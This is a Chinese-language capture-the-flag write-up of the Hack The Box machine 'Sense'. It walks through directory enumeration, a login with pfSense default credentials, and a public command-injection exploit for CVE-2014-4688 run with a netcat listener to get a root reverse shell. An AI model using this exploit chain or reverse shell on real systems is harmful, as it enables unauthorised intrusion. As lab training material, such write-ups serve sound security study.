Sense
这题比较简单
Scan
nmap扫描
nmap -sSV -T4 -F 10.10.10.60
Web
dirsearch
# Security Changelog
### Issue
There was a failure in updating the firewall. Manual patching is therefore required
### Mitigated
2 of 3 vulnerabilities have been patched.
### Timeline
The remaining patches will be installed during the next maintenance window
有防火墙,有漏洞,3个漏洞修了2个
gobuster
┌──(xavier㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/wfuzz/general/big.txt -u https://10.10.10.60 -k
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://10.10.10.60
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/wfuzz/general/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/04/05 22:14:24 Starting gobuster in directory enumeration mode
===============================================================
/~ (Status: 403) [Size: 345]
/classes (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/]
/css (Status: 301) [Size: 0] [--> https://10.10.10.60/css/]
/includes (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/]
/javascript (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/]
/tree (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/]
Progress: 3024 / 3025 (99.97%)
===============================================================
2023/04/05 22:15:57 Finished
===============================================================
没啥想法,多用几个字典跑
┌──(xavier㉿kali)-[~]
└─$ dirsearch -e html,json,php,cgi,txt,jar -u https://10.10.10.60/ -x 403 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
找到system-users.txt,提示信息如下:
####Support ticket###
Please create the following user
username: Rohit
password: company defaults
Sense的默认用户名和密码为admin/phsense,最后用rohit/phsense成功登录。
root
┌──(xavier㉿kali)-[~/Desktop/HTB/009-Sense]
└─$ searchsploit pfsense 2.1.3
------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------ ---------------------------------
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | php/webapps/43560.py
------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(xavier㉿kali)-[~/Desktop/HTB/009-Sense]
└─$ searchsploit -m php/webapps/43560.py
Exploit: pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection
URL: https://www.exploit-db.com/exploits/43560
Path: /usr/share/exploitdb/exploits/php/webapps/43560.py
Codes: CVE-2014-4688
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/xavier/Desktop/HTB/009-Sense/43560.py
┌──(xavier㉿kali)-[~/Desktop/HTB/009-Sense]
└─$ python3 43560.py -h
usage: 43560.py [-h] [--rhost RHOST] [--lhost LHOST] [--lport LPORT] [--username USERNAME]
[--password PASSWORD]
options:
-h, --help show this help message and exit
--rhost RHOST Remote Host
--lhost LHOST Local Host listener
--lport LPORT Local Port listener
--username USERNAME pfsense Username
--password PASSWORD pfsense Password
┌──(xavier㉿kali)-[~/Desktop/HTB/009-Sense]
└─$ python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.18 --lport 8888 --username rohit --password pfsense
CSRF token obtained
Running exploit...
Exploit completed
那边nc监听,收到反弹shell:
┌──(xavier㉿kali)-[~]
└─$ nc -nlvp 8888
listening on [any] 8888 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.60] 19778
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# whoami
root
# cat /home/rohit/user.txt
872xxxxxxx
#
# cat /root/root.txt
d08xxxxxxx
#HTB #OSCP